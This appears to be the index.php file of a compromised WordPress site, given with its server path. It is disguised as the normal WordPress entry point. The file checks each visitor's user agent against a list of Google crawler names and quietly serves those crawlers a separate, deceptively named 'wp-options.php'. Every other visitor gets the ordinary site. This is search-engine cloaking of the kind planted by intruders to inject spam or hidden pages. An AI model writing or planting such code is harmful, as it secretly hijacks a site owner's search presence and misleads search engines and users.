File: /home/u728655182/domains/chasquisrl.com.ar/public_html/index.php
<?php
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$google_bots = [
'Googlebot', 'Googlebot-News', 'Googlebot-Image', 'Googlebot-Video',
'Googlebot-Mobile', 'Mediapartners-Google', 'AdsBot-Google',
'AdsBot-Google-Mobile', 'APIs-Google', 'Google Favicon',
'Google Web Preview', 'Feedfetcher-Google', 'DuplexWeb-Google',
'Google-InspectionTool', 'Googlebot-AdsBot', 'Googlebot-Desktop',
'Googlebot-Search', 'Googlebot-Events', 'Googlebot-Tablet',
'Googlebot-Local', 'Googlebot-Apps', 'Googlebot-Connect', 'Googlebot-Books',
'Googlebot-Publisher', 'Googlebot-News-RSS'
];
foreach ($google_bots as $bot) {
if (stripos($user_agent, $bot) !== false) {
require __DIR__ . '/wp-options.php';
exit;
}
}
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';